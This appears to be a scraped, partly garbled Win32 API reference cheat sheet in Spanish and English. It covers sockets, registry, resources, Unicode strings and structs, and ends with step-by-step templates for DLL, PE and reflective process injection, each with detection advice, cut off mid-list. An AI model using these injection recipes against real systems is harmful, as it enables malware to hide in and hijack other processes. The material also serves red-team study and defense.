WSARecv```c int WSARecv( SOCKET s, // Descriptor identifying a connected socket. LPWSABUF lpBuffers, // Array of buffers to receive the incoming data. DWORD dwBufferCount, // Number of buffers in the lpBuffers array. LPDWORD lpNumberOfBytesRecvd, // Pointer to the number of bytes received by this function call. LPDWORD lpFlags, // Flags to modify the behavior of the function call. LPWSAOVERLAPPED lpOverlapped, // Pointer to an overlapped structure for asynchronous operations. LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine // Pointer to the completion routine called when the receive operation has been completed. ); //Receives data from a connected socket, and can also be used for both synchronous and asynchronous data transfer.

root@kitploit:~
[WSASendTo](https://learn.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-wsasendto)```c
int WSASendTo(
    SOCKET s, // Descriptor identifying a socket.
    LPWSABUF lpBuffers, // Array of buffers containing the data to be sent.
    DWORD dwBufferCount, // Number of buffers in the lpBuffers array.
    LPDWORD lpNumberOfBytesSent, // Pointer to the number of bytes sent by this function call.
    DWORD dwFlags, // Flags to modify the behavior of the function call.
    const struct sockaddr* lpTo, // Pointer to the sockaddr structure for the target address.
    int iToLen, // Size of the address in lpTo.
    LPWSAOVERLAPPED lpOverlapped, // Pointer to an overlapped structure for asynchronous operations.
    LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine // Pointer to the completion routine called when the send operation has been completed.
); // Sends data to a specific destination, for use with connection - less socket types such as SOCK_DGRAM.

WSARecvFrom```c int WSARecvFrom( SOCKET s, // Descriptor identifying a socket. LPWSABUF lpBuffers, // Array of buffers to receive the incoming data. DWORD dwBufferCount, // Number of buffers in the lpBuffers array. LPDWORD lpNumberOfBytesRecvd, // Pointer to the number of bytes received by this function call. LPDWORD lpFlags, // Flags to modify the behavior of the function call. struct sockaddr* lpFrom, // Pointer to an address structure that will receive the source address upon completion of the operation. LPINT lpFromlen, // Pointer to the size of the lpFrom address structure. LPWSAOVERLAPPED lpOverlapped, // Pointer to an overlapped structure for asynchronous operations. LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine // Pointer to the completion routine called when the receive operation has been completed. ); //Receives data from a specific source, used with connection - less socket types such as SOCK_DGRAM.

root@kitploit:~
[WSAAsyncSelect](https://learn.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-wsaasyncselect)```c
int WSAAsyncSelect(
    SOCKET s, // Descriptor identifying the socket.
    HWND hWnd, // Handle to the window which should receive the message.
    unsigned int wMsg, // Message to be received when an event occurs.
    long lEvent // Bitmask specifying a group of conditions to be monitored.
); // Requests Windows message - based notification of network events for a socket.

socket```c SOCKET socket( int af, int type, int protocol ); // Creates a new socket for network communication.

root@kitploit:~
[bind](https://docs.microsoft.com/en-us/windows/win32/api/winsock/nf-winsock-bind)```c
int bind(
    SOCKET s, 
    const struct sockaddr *name, 
    int namelen
); // Binds a socket to a specific local address and port.

listen```c int listen( SOCKET s, int backlog ); // Sets a socket to listen for incoming connections.

root@kitploit:~
[accept](https://learn.microsoft.com/en-us/windows/win32/api/Winsock2/nf-winsock2-accept)```c
SOCKET accept(
    SOCKET s, 
    struct sockaddr *addr, 
    int *addrlen
); // Accepts a new incoming connection on a listening socket.

connect```c int connect( SOCKET s, const struct sockaddr *name, int namelen ); // Initiates a connection on a socket to a remote address.

root@kitploit:~
[send](https://learn.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-send)```c
int send(
    SOCKET s, 
    const char *buf, 
    int len, 
    int flags
); // Sends data on a connected socket.

recv```c int recv( SOCKET s, char *buf, int len, int flags ); // Receives data from a connected socket.

root@kitploit:~
[closesocket](https://learn.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-closesocket)```c
int closesocket(
    SOCKET s
); //Closes a socket and frees its resources.

gethostbyname```c hostent* gethostbyname( const char* name // either a hostname or an IPv4 address in dotted-decimal notation ); // returns a pointer to a hostent struct. NOTE: Typically better to use getaddrinfo

root@kitploit:~
### Operaciones del Registro
[RegOpenKeyExW](https://learn.microsoft.com/en-us/windows/win32/api/winreg/nf-winreg-regopenkeyexw)```c
LONG RegOpenKeyExW(
    HKEY hKey, 
    LPCWTSTR lpSubKey, 
    DWORD ulOptions, 
    REGSAM samDesired, 
    PHKEY phkResult
); // Opens the specified registry key.

RegQueryValueExW```c LONG RegQueryValueExW( HKEY hKey, LPCWTSTR lpValueName, LPDWORD lpReserved, LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData ); // Retrieves the type and data of the specified value name associated with an open registry key.

root@kitploit:~
[RegSetValueExW](https://learn.microsoft.com/en-us/windows/win32/api/winreg/nf-winreg-regsetvalueexw)```c
LONG RegSetValueEx(
    HKEY hKey, 
    LPCWTSTR lpValueName, 
    DWORD Reserved, 
    DWORD dwType, 
    const BYTE *lpData, 
    DWORD cbData
); // Sets the data and type of the specified value name associated with an open registry key.

RegCloseKey```c LONG RegCloseKey( HKEY hKey ); // Closes a handle to the specified registry key.

root@kitploit:~
[RegCreateKeyExA](https://learn.microsoft.com/en-us/windows/win32/api/winreg/nf-winreg-regcreatekeyexa)```c
LSTATUS RegCreateKeyExA(
  [in]            HKEY                        hKey,
  [in]            LPCSTR                      lpSubKey,
                  DWORD                       Reserved,
  [in, optional]  LPSTR                       lpClass,
  [in]            DWORD                       dwOptions,
  [in]            REGSAM                      samDesired,
  [in, optional]  const LPSECURITY_ATTRIBUTES lpSecurityAttributes,
  [out]           PHKEY                       phkResult,
  [out, optional] LPDWORD                     lpdwDisposition
); // Creates the specified registry key. If the key already exists, the function opens it. Note that key names are not case sensitive. 

RegSetValueExA```c LSTATUS RegSetValueExA( [in] HKEY hKey, [in, optional] LPCSTR lpValueName, DWORD Reserved, [in] DWORD dwType, [in] const BYTE *lpData, [in] DWORD cbData ); // Sets the data and type of a specified value under a registry key.

root@kitploit:~
[RegCreateKeyA](https://learn.microsoft.com/en-us/windows/win32/api/winreg/nf-winreg-regcreatekeya)```c
LSTATUS RegCreateKeyA(
  [in]           HKEY   hKey,
  [in, optional] LPCSTR lpSubKey,
  [out]          PHKEY  phkResult
); // Creates the specified registry key. If the key already exists in the registry, the function opens it.

RegDeleteKeyA```c LSTATUS RegDeleteKeyA( [in] HKEY hKey, [in] LPCSTR lpSubKey ); // Deletes a subkey and its values. Note that key names are not case sensitive.

root@kitploit:~
[NtRenameKey](https://learn.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntrenamekey)```c
__kernel_entry NTSTATUS NtRenameKey(
  [in] HANDLE          KeyHandle,
  [in] PUNICODE_STRING NewName
); // Changes the name of the specified registry key.

Manejo de errores

WSAGetLastError```c int WSAGetLastError( void ); // Returns the error status for the last Windows Sockets operation that failed.

root@kitploit:~
[WSASetLastError](https://docs.microsoft.com/en-us/windows/win32/api/winsock/nf-winsock-wsasetlasterror)```c
void WSASetLastError(
    int iError
); // Sets the error status for the last Windows Sockets operation.

WSAGetOverlappedResult```c BOOL WSAGetOverlappedResult( SOCKET s, LPWSAOVERLAPPED lpOverlapped, LPDWORD lpcbTransfer, BOOL fWait, LPDWORD lpdwFlags ); // Determines the results of an overlapped operation on the specified socket.

root@kitploit:~
[WSAIoctl](https://docs.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-wsaioctl)```c
int WSAIoctl(
    SOCKET s, 
    DWORD dwIoControlCode, 
    LPVOID lpvInBuffer, 
    DWORD cbInBuffer, 
    LPVOID lpvOutBuffer, 
    DWORD cbOutBuffer, 
    LPDWORD lpcbBytesReturned, 
    LPWSAOVERLAPPED lpOverlapped, 
    LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine
); // Controls the mode of a socket.

WSACreateEvent```c WSAEVENT WSACreateEvent( void ); // Creates a new event object.

root@kitploit:~
[WSASetEvent](https://docs.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-wsasetevent)```c
BOOL WSASetEvent(
    WSAEVENT hEvent
); // Sets the state of the specified event object to signaled.

WSAResetEvent```c BOOL WSAResetEvent( WSAEVENT hEvent ); // Sets the state of the specified event object to nonsignaled.

root@kitploit:~
[WSACloseEvent](https://docs.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-wsacloseevent)```c
BOOL WSACloseEvent(
    WSAEVENT hEvent
); // Closes an open event object handle.

WSAWaitForMultipleEvents```c DWORD WSAWaitForMultipleEvents( DWORD cEvents, const WSAEVENT *lphEvents, BOOL fWaitAll, DWORD dwTimeout, BOOL fAlertable ); // Waits for multiple event objects and returns when the specified events are signaled or the time-out interval elapses.

root@kitploit:~
### Gestión de recursos
[FindResource](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-findresourcea)```c
HRSRC FindResource(
  [in, optional] HMODULE hModule,   // A handle to the module whose portable executable file or an accompanying MUI file contains the resource. If this parameter is NULL, the function searches the module used to create the current process.
  [in]           LPCSTR  lpName,    // The name of the resource.
  [in]           LPCSTR  lpType     // The resource type.
); // Determines the location of a resource with the specified type and name in the specified module.
root@kitploit:~
HRSRC res = FindResource(NULL, MAKEINTRESOURCE(FAVICON_ICO), RT_RCDATA);

LoadResource```c HGLOBAL LoadResource( [in, optional] HMODULE hModule, // A handle to the module whose executable file contains the resource. [in] HRSRC hResInfo // A handle to the resource to be loaded. ); // Retrieves a handle that can be used to obtain a pointer to the first byte of the specified resource in memory.

root@kitploit:~
```c
HGLOBAL resHandle = resHandle = LoadResource(NULL, res);

LockResource```c LPVOID LockResource( [in] HGLOBAL hResData // A handle to the resource to be accessed ); // Retrieves a pointer to the specified resource in memory.

root@kitploit:~
```c
unsigned char * payload = (char *) LockResource(resHandle);

SizeofResource```c DWORD SizeofResource( [in, optional] HMODULE hModule, // A handle to the module whose executable file contains the resource [in] HRSRC hResInfo // A handle to the resource. This handle must be created by using FindResource ); // Retrieves the size, in bytes, of the specified resource.

root@kitploit:~
```c
unsigned int payload_len = SizeofResource(NULL, res);

Funciones de Cadenas Unicode```c

#include <wchar.h> // for wide character string routines

root@kitploit:~
### Longitud de cadena```c
size_t wcslen(
    const wchar_t *str
); // Returns the length of the given wide string.

Copia de cadena

[wcscpy]```c wchar_t *wcscpy( wchar_t *dest, const wchar_t *src ); // Copies the wide string from src to dest.

root@kitploit:~
[wcsncpy]```c
wchar_t *wcsncpy(
    wchar_t *dest, 
    const wchar_t *src, 
    size_t count
); // Copies at most count characters from the wide string src to dest.

Concatenación de cadenas

[wcscat]```c wchar_t *wcscat( wchar_t *dest, const wchar_t *src ); // Appends the wide string src to the end of the wide string dest.

root@kitploit:~
[wcsncat]```c
wchar_t *wcsncat(
    wchar_t *dest, 
    const wchar_t *src, 
    size_t count
); // Appends at most count characters from the wide string src to the end of the wide string dest.

Comparación de cadenas

[wcscmp]```c int wcscmp( const wchar_t *str1, const wchar_t *str2 ); // Compares two wide strings lexicographically.

root@kitploit:~
[wcsncmp]```c
int wcsncmp(
    const wchar_t *str1, 
    const wchar_t *str2, 
    size_t count
); // Compares up to count characters of two wide strings lexicographically.

[_wcsicmp]```c int _wcsicmp( const wchar_t *str1, const wchar_t *str2 ); // Compares two wide strings lexicographically, ignoring case.

root@kitploit:~
[_wcsnicmp]```c
int _wcsnicmp(
    const wchar_t *str1, 
    const wchar_t *str2, 
    size_t count
); // Compares up to count characters of two wide strings lexicographically, ignoring case.

Búsqueda de cadenas

[wcschr]```c wchar_t *wcschr( const wchar_t *str, wchar_t c ); // Finds the first occurrence of the wide character c in the wide string str.

root@kitploit:~
[wcsrchr]```c
wchar_t *wcsrchr(
    const wchar_t *str, 
    wchar_t c
); // Finds the last occurrence of the wide character c in the wide string str.

[wcspbrk]```c wchar_t *wcspbrk( const wchar_t *str1, const wchar_t *str2 ); // Finds the first occurrence in the wide string str1 of any character from the wide string str2.

root@kitploit:~
[wcsstr]```c
wchar_t *wcsstr(
    const wchar_t *str1, 
    const wchar_t *str2
); // Finds the first occurrence of the wide string str2 in the wide string str1.

[wcstok]```c wchar_t *wcstok( wchar_t *str, const wchar_t *delimiters ); // Splits the wide string str into tokens based on the delimiters.

root@kitploit:~
### Clasificación y conversión de caracteres
[towupper]```c
wint_t towupper(
    wint_t c
); // Converts a wide character to uppercase.

[towlower]```c wint_t towlower( wint_t c ); // Converts a wide character to lowercase.

root@kitploit:~
[iswalpha]```c
int iswalpha(
    wint_t c
); // Checks if the wide character is an alphabetic character.

[iswdigit]```c int iswdigit( wint_t c ); // Checks if the wide character is a decimal digit.

root@kitploit:~
[iswalnum]```c
int iswalnum(
    wint_t c
); // Checks if the wide character is an alphanumeric character.

[iswspace]```c int iswspace( wint_t c ); // Checks if the wide character is a whitespace character.

root@kitploit:~
[iswxdigit]```c
int iswxdigit(
    wint_t c
); // Checks if the wide character is a valid hexadecimal digit.

Hoja de referencia de estructuras Win32

Estructuras comunes

SYSTEM_INFO```cpp #include <sysinfoapi.h> // Contains information about the current computer system, including the architecture and type of the processor, the number of processors, and the page size. typedef struct _SYSTEM_INFO { union { DWORD dwOemId; struct { WORD wProcessorArchitecture; WORD wReserved; } DUMMYSTRUCTNAME; } DUMMYUNIONNAME; DWORD dwPageSize; LPVOID lpMinimumApplicationAddress; LPVOID lpMaximumApplicationAddress; DWORD_PTR dwActiveProcessorMask; DWORD dwNumberOfProcessors; DWORD dwProcessorType; DWORD dwAllocationGranularity; WORD wProcessorLevel; WORD wProcessorRevision; } SYSTEM_INFO;

root@kitploit:~
[**`FILETIME`**](https://docs.microsoft.com/en-us/windows/win32/api/minwinbase/ns-minwinbase-filetime)```cpp
#include <minwinbase.h>
// Represents the number of 100-nanosecond intervals since January 1, 1601 (UTC). Used for file and system time.
typedef struct _FILETIME {
    DWORD dwLowDateTime;
    DWORD dwHighDateTime;
} FILETIME;

STARTUPINFO```cpp #include <processthreadsapi.h> // Specifies the window station, desktop, standard handles, and appearance of the main window for a process at creation time. typedef struct _STARTUPINFOA { DWORD cb; LPSTR lpReserved; LPSTR lpDesktop; LPSTR lpTitle; DWORD dwX; DWORD dwY; DWORD dwXSize; DWORD dwYSize; DWORD dwXCountChars; DWORD dwYCountChars; DWORD dwFillAttribute; DWORD dwFlags; WORD wShowWindow; WORD cbReserved2; LPBYTE lpReserved2; HANDLE hStdInput; HANDLE hStdOutput; HANDLE hStdError; } STARTUPINFOA, *LPSTARTUPINFOA;

root@kitploit:~
[**`PROCESS_INFORMATION`**](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/ns-processthreadsapi-process_information)```cpp
#include <processthreadsapi.h>
// Contains information about a newly created process and its primary thread.
typedef struct _PROCESS_INFORMATION {
    HANDLE hProcess;
    HANDLE hThread;
    DWORD  dwProcessId;
    DWORD  dwThreadId;
} PROCESS_INFORMATION, *LPPROCESS_INFORMATION;

PROCESSENTRY32```c #include <tlhelp32.h> typedef struct tagPROCESSENTRY32 { DWORD dwSize; DWORD cntUsage; DWORD th32ProcessID; ULONG_PTR th32DefaultHeapID; DWORD th32ModuleID; DWORD cntThreads; DWORD th32ParentProcessID; LONG pcPriClassBase; DWORD dwFlags; CHAR szExeFile[MAX_PATH]; } PROCESSENTRY32;

root@kitploit:~
[**`SECURITY_ATTRIBUTES`**](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa379560(v=vs.85))```cpp
// Determines whether the handle can be inherited by child processes and specifies a security descriptor for a new object.
typedef struct _SECURITY_ATTRIBUTES {
    DWORD  nLength;
    LPVOID lpSecurityDescriptor;
    BOOL   bInheritHandle;
} SECURITY_ATTRIBUTES, *LPSECURITY_ATTRIBUTES;

OVERLAPPED```cpp #inluce <minwinbase.h> // Contains information used in asynchronous (also known as overlapped) input and output (I/O) operations. typedef struct _OVERLAPPED { ULONG_PTR Internal; ULONG_PTR InternalHigh; union { struct { DWORD Offset; DWORD OffsetHigh; } DUMMYSTRUCTNAME; PVOID Pointer; } DUMMYUNIONNAME; HANDLE hEvent; } OVERLAPPED, *LPOVERLAPPED;

root@kitploit:~
[**`GUID`**](https://docs.microsoft.com/en-us/windows/win32/api/guiddef/ns-guiddef-guid)```cpp
#include <guiddef.h>
// Represents a globally unique identifier (GUID), used to identify objects, interfaces, and other items.
typedef struct _GUID {
    unsigned long  Data1;
    unsigned short Data2;
    unsigned short Data3;
    unsigned char  Data4[8];
} GUID;

MEMORY_BASIC_INFORMATION```cpp #include <winnt.h> // Contains information about a range of pages in the virtual address space of a process. typedef struct _MEMORY_BASIC_INFORMATION { PVOID BaseAddress; PVOID AllocationBase; DWORD AllocationProtect; SIZE_T RegionSize; DWORD State; DWORD Protect; DWORD Type; } MEMORY_BASIC_INFORMATION, *PMEMORY_BASIC_INFORMATION;

root@kitploit:~
[**`SYSTEMTIME`**](https://docs.microsoft.com/en-us/windows/win32/api/minwinbase/ns-minwinbase-systemtime)```cpp
#include <minwinbase.h>
// Specifies a date and time, using individual members for the month, day, year, weekday, hour, minute, second, and millisecond.
typedef struct _SYSTEMTIME {
    WORD wYear;
    WORD wMonth;
    WORD wDayOfWeek;
    WORD wDay;
    WORD wHour;
    WORD wMinute;
    WORD wSecond;
    WORD wMilliseconds;
} SYSTEMTIME, *PSYSTEMTIME, *LPSYSTEMTIME;

COORD```cpp // Defines the coordinates of a character cell in a console screen buffer, where the origin (0,0) is at the top-left corner. typedef struct _COORD { SHORT X; SHORT Y; } COORD, *PCOORD;

root@kitploit:~
[**`SMALL_RECT`**](https://docs.microsoft.com/en-us/windows/console/small-rect-str)```cpp
//  Defines the coordinates of the upper left and lower right corners of a rectangle.
typedef struct _SMALL_RECT {
    SHORT Left;
    SHORT Top;
    SHORT Right;
    SHORT Bottom;
} SMALL_RECT;

CONSOLE_SCREEN_BUFFER_INFO```cpp // Contains information about a console screen buffer. typedef struct _CONSOLE_SCREEN_BUFFER_INFO { COORD dwSize; COORD dwCursorPosition; WORD wAttributes; SMALL_RECT srWindow; COORD dwMaximumWindowSize; } CONSOLE_SCREEN_BUFFER_INFO, *PCONSOLE_SCREEN_BUFFER_INFO;

root@kitploit:~
[**`WSADATA`**](https://docs.microsoft.com/en-us/windows/win32/api/winsock/ns-winsock-wsadata)```cpp
#include <winsock.h>
// Contains information about the Windows Sockets implementation.
typedef struct WSAData {
    WORD           wVersion;
    WORD           wHighVersion;
    unsigned short iMaxSockets;
    unsigned short iMaxUdpDg;
    char FAR       *lpVendorInfo;
    char           szDescription[WSADESCRIPTION_LEN+1];
    char           szSystemStatus[WSASYS_STATUS_LEN+1];
} WSADATA, *LPWSADATA;

[CRITICAL_SECTION](struct RTL_CRITICAL_SECTION (nirsoft.net))```c++ // Represents a critical section object, which is used to provide synchronization access to a shared resource. typedef struct _RTL_CRITICAL_SECTION { PRTL_CRITICAL_SECTION_DEBUG DebugInfo; LONG LockCount; LONG RecursionCount; HANDLE OwningThread; HANDLE LockSemaphore; ULONG_PTR SpinCount; } RTL_CRITICAL_SECTION, *PRTL_CRITICAL_SECTION;

root@kitploit:~
[**`WSAPROTOCOL_INFO`**](https://docs.microsoft.com/en-us/windows/win32/api/winsock2/ns-winsock2-wsaprotocol_infoa)```c++
#include <winsock2.h>
// Contains Windows Sockets protocol information.
typedef struct _WSAPROTOCOL_INFOA {
    DWORD          dwServiceFlags1;
    DWORD          dwServiceFlags2;
    DWORD          dwServiceFlags3;
    DWORD          dwServiceFlags4;
    DWORD          dwProviderFlags;
    GUID           ProviderId;
    DWORD          dwCatalogEntryId;
    WSAPROTOCOLCHAIN ProtocolChain;
    int            iVersion;
    int            iAddressFamily;
    int            iMaxSockAddr;
    int            iMinSockAddr;
    int            iSocketType;
    int            iProtocol;
    int            iProtocolMaxOffset;
    int            iNetworkByteOrder;
    int            iSecurityScheme;
    DWORD          dwMessageSize;
    DWORD          dwProviderReserved;
    CHAR           szProtocol[WSAPROTOCOL_LEN+1];
} WSAPROTOCOL_INFOA, *LPWSAPROTOCOL_INFOA;

MSGHDR```c++ #include <ws2def.h> // Contains message information for use with the sendmsg and recvmsg functions. typedef struct _WSAMSG { LPSOCKADDR name; INT namelen; LPWSABUF lpBuffers; ULONG dwBufferCount; WSABUF Control; ULONG dwFlags; } WSAMSG, *PWSAMSG, *LPWSAMSG;

root@kitploit:~
### Hoja de referencia de estructuras de sockets Win32 (winsock.h)
[**`SOCKADDR`**](https://docs.microsoft.com/en-us/windows/win32/api/winsock/ns-winsock-sockaddr)```cpp
// A generic socket address structure used for compatibility with various address families.
typedef struct sockaddr {
    u_short sa_family;
    char    sa_data[14];
} SOCKADDR, *PSOCKADDR, *LPSOCKADDR;

SOCKADDR_IN```cpp // Represents an IPv4 socket address, containing the IPv4 address, port number, and address family. typedef struct sockaddr_in { short sin_family; u_short sin_port; struct in_addr sin_addr; char sin_zero[8]; } SOCKADDR_IN, *PSOCKADDR_IN, *LPSOCKADDR_IN;

root@kitploit:~
[**`LINGER`**](https://docs.microsoft.com/en-us/windows/win32/api/winsock/ns-winsock-linger)```cpp
// Used to set the socket option SO_LINGER, which determines the action taken when unsent data is queued on a socket and a `closesocket` is performed.
typedef struct linger {
    u_short l_onoff;
    u_short l_linger;
} LINGER, *PLINGER, *LPLINGER;

TIMEVAL```cpp // Represents a time interval, used with the select function to specify a timeout period. typedef struct timeval { long tv_sec; long tv_usec; } TIMEVAL, *PTIMEVAL, *LPTIMEVAL;

root@kitploit:~
[**`FD_SET`**](https://docs.microsoft.com/en-us/windows/win32/api/winsock/ns-winsock-fd_set)```cpp
// Represents a set of sockets used with the `select` function to check for socket events.
typedef struct fd_set {
    u_int fd_count;
    SOCKET fd_array[FD_SETSIZE];
} fd_set, *Pfd_set, *LPfd_set;

Hoja de referencia de estructuras de sockets Win32 (winsock2.h)

IN_ADDR```cpp // Represents an IPv4 address. typedef struct in_addr { union { struct { u_char s_b1, s_b2, s_b3, s_b4; } S_un_b; struct { u_short s_w1, s_w2; } S_un_w; u_long S_addr; } S_un; } IN_ADDR, *PIN_ADDR, *LPIN_ADDR;

root@kitploit:~
### Hoja de referencia de estructuras de sockets Win32 (ws2def.h)
[**`ADDRINFO`**](https://learn.microsoft.com/en-us/windows/win32/api/ws2def/ns-ws2def-addrinfow)```cpp
#include <ws2def.h>
// Contains information about an address for use with the `getaddrinfo` function, and is used to build a linked list of addresses.
typedef struct addrinfoW {
    int             ai_flags;
    int             ai_family;
    int             ai_socktype;
    int             ai_protocol;
    size_t          ai_addrlen;
    PWSTR           *ai_canonname;
    struct sockaddr *ai_addr;
    struct addrinfo *ai_next;
} ADDRINFOW, *PADDRINFOW;

WSABUF```cpp #include <ws2def.h> // Contains a pointer to a buffer and its length. Used for scatter/gather I/O operations. typedef struct _WSABUF { ULONG len; __field_bcount(len) CHAR FAR *buf; } WSABUF, FAR * LPWSABUF;

root@kitploit:~
[**`SOCKADDR_IN6`**](https://docs.microsoft.com/en-us/windows/win32/api/ws2ipdef/ns-ws2ipdef-sockaddr_in6)```cpp
#include <ws2ipdef.h>
// Represents an IPv6 socket address, containing the IPv6 address, port number, flow info, and address family.
typedef struct sockaddr_in6 {
    short          sin6_family;
    u_short        sin6_port;
    u_long         sin6_flowinfo;
    struct in6_addr sin6_addr;
    u_long         sin6_scope_id;
} SOCKADDR_IN6, *PSOCKADDR_IN6, *LPSOCKADDR_IN6;

IN6_ADDR```cpp #include <in6addr.h> // Represents an IPv6 address. typedef struct in6_addr { union { u_char Byte[16]; u_short Word[8]; } u; } IN6_ADDR, *PIN6_ADDR, *LPIN6_ADDR;

root@kitploit:~
# Técnicas de inyección de código

## 1. Inyección de DLL

Esta técnica obliga a un proceso a cargar una DLL maliciosa.

APIs clave:
- [`OpenProcess`](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess)  ```c
  HANDLE OpenProcess(
    DWORD dwDesiredAccess,
    BOOL  bInheritHandle,
    DWORD dwProcessId
  );

VirtualAllocEx ```c LPVOID VirtualAllocEx( HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect );

root@kitploit:~
- [`WriteProcessMemory`](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-writeprocessmemory)  ```c
BOOL WriteProcessMemory(
  HANDLE  hProcess,
  LPVOID  lpBaseAddress,
  LPCVOID lpBuffer,
  SIZE_T  nSize,
  SIZE_T  *lpNumberOfBytesWritten
);

CreateRemoteThread ```c HANDLE CreateRemoteThread( HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId );

root@kitploit:~
- [`GetProcAddress`](https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-getprocaddress)  ```c
FARPROC GetProcAddress(
  HMODULE hModule,
  LPCSTR  lpProcName
);
  • LoadLibrary ```c HMODULE LoadLibraryA( LPCSTR lpLibFileName );
    root@kitploit:~
  • NtCreateThread (No documentado) ```c NTSTATUS NTAPI NtCreateThread( OUT PHANDLE ThreadHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN HANDLE ProcessHandle, OUT PCLIENT_ID ClientId, IN PCONTEXT ThreadContext, IN PINITIAL_TEB InitialTeb, IN BOOLEAN CreateSuspended );
    root@kitploit:~
  • RtlCreateUserThread (No documentado) ```c NTSTATUS NTAPI RtlCreateUserThread( IN HANDLE ProcessHandle, IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL, IN BOOLEAN CreateSuspended, IN ULONG StackZeroBits, IN OUT PULONG StackReserved, IN OUT PULONG StackCommit, IN PVOID StartAddress, IN PVOID StartParameter OPTIONAL, OUT PHANDLE ThreadHandle, OUT PCLIENT_ID ClientId );
    root@kitploit:~

Plantilla:

  1. Abrir el proceso objetivo con OpenProcess
  2. Asignar memoria en el proceso objetivo con VirtualAllocEx
  3. Escribir la ruta de la DLL en la memoria asignada con WriteProcessMemory
  4. Obtener la dirección de LoadLibraryA usando GetProcAddress
  5. Crear un hilo remoto en el proceso objetivo con CreateRemoteThread, apuntando a LoadLibraryA, y pasar la dirección de LoadLibraryA como parámetro lpStartAddress.
  6. (Opcional) Usar NtCreateThread o RtlCreateUserThread para métodos alternativos de creación de hilos

Detección y Defensa:

  • Supervisar patrones sospechosos de acceso a procesos y asignación de memoria
  • Usar listas blancas de aplicaciones para impedir la carga de DLL no autorizadas
  • Implementar comprobaciones de integridad de procesos
  • Usar herramientas como Process Monitor de Microsoft para detectar intentos de inyección de DLL

2. Inyección de PE

Esta técnica consiste en escribir y ejecutar código malicioso en un proceso remoto o en el mismo proceso (autoinyección).

APIs clave:

  • OpenThread ```c HANDLE OpenThread( DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwThreadId );
    root@kitploit:~
  • SuspendThread ```c DWORD SuspendThread( HANDLE hThread );
    root@kitploit:~
  • VirtualAllocEx (ver arriba)
  • WriteProcessMemory (ver arriba)
  • SetThreadContext ```c BOOL SetThreadContext( HANDLE hThread, const CONTEXT *lpContext );
    root@kitploit:~

ResumeThread ```c DWORD ResumeThread( HANDLE hThread );

root@kitploit:~
`NtResumeThread` (No documentado)  ```c
NTSTATUS NTAPI NtResumeThread(
  IN HANDLE ThreadHandle,
  OUT PULONG PreviousSuspendCount OPTIONAL
);

Plantilla:

  1. Abra el hilo objetivo con OpenThread
  2. Suspenda el hilo con SuspendThread
  3. Asigne memoria en el proceso objetivo con VirtualAllocEx
  4. Escriba el código malicioso en la memoria asignada con WriteProcessMemory
  5. Modifique el contexto del hilo para que apunte al código inyectado con SetThreadContext
  6. Reanude el hilo con ResumeThread o NtResumeThread

Detección y Defensa:

  • Supervise patrones inusuales de suspensión y reanudación de hilos
  • Implemente comprobaciones de integridad de memoria
  • Utilice soluciones de Detección y Respuesta de Endpoints (EDR) para detectar modificaciones de memoria sospechosas
  • Emplee técnicas de escaneo de memoria de procesos en tiempo de ejecución

3. Inyección reflectiva

Similar a la inyección de PE pero evita usar LoadLibrary y CreateRemoteThread. Consiste en escribir un cargador personalizado que pueda cargar una DLL desde la memoria sin usar el cargador estándar de Windows.

APIs clave:

  • CreateFileMapping ```c HANDLE CreateFileMappingA( HANDLE hFile, LPSECURITY_ATTRIBUTES lpFileMappingAttributes, DWORD flProtect, DWORD dwMaximumSizeHigh, DWORD dwMaximumSizeLow, LPCSTR lpName );
    root@kitploit:~
  • MapViewOfFile ```c LPVOID MapViewOfFile( HANDLE hFileMappingObject, DWORD dwDesiredAccess, DWORD dwFileOffsetHigh, DWORD dwFileOffsetLow, SIZE_T dwNumberOfBytesToMap );
    root@kitploit:~
  • OpenProcess (ver arriba)
  • memcpy ```c void *memcpy( void *dest, const void *src, size_t count );
    root@kitploit:~
  • ZwMapViewOfSection (Documentado para modo kernel) ```c NTSTATUS ZwMapViewOfSection( HANDLE SectionHandle, HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, SIZE_T CommitSize, PLARGE_INTEGER SectionOffset, PSIZE_T ViewSize, SECTION_INHERIT InheritDisposition, ULONG AllocationType, ULONG Win32Protect );
    root@kitploit:~
  • CreateThread (ver CreateRemoteThread arriba)

APIs adicionales a veces utilizadas:

  • VirtualQueryEx ```c SIZE_T VirtualQueryEx( HANDLE hProcess, LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength );
    root@kitploit:~

ReadProcessMemory ```c BOOL ReadProcessMemory( HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead );

root@kitploit:~
Plantilla:
1. Crear una asignación de archivos de la DLL con `CreateFileMapping`
2. Asignar una vista del archivo con `MapViewOfFile`
3. Abrir el proceso de destino con `OpenProcess`
